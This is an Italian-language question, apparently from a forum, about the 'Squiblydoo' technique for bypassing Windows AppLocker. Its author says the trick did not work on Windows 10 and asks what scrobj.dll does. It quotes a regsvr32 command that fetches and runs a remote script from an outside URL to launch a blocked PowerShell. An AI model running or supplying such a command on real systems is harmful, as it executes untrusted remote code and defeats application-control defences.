Ho letto su alcuni blog di un trucco chiamato "Squibblydoo", in cui il seguente comando può ignorare AppLocker di Windows:
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
Dove l'URL punta a un file di script che contiene un comando per aprire Powershell (che, nello scenario, è bloccato da AppLocker).
Tuttavia, l'ho provato su una macchina Win10 e non ha funzionato.
Inoltre, sono confuso su cosa faccia esattamente. Tutto quello che so è che chiama DllUninstall
da un file in un server (ma che potrebbe anche essere un file locale) e registra scrobj.dll
(ma davvero non capisco la relazione qui. Che cos'è scrobj.dll
facendo esattamente?) e che per qualche ragione fa eseguire lo script nel file, che può quindi aprire un'applicazione bloccata da AppLocker.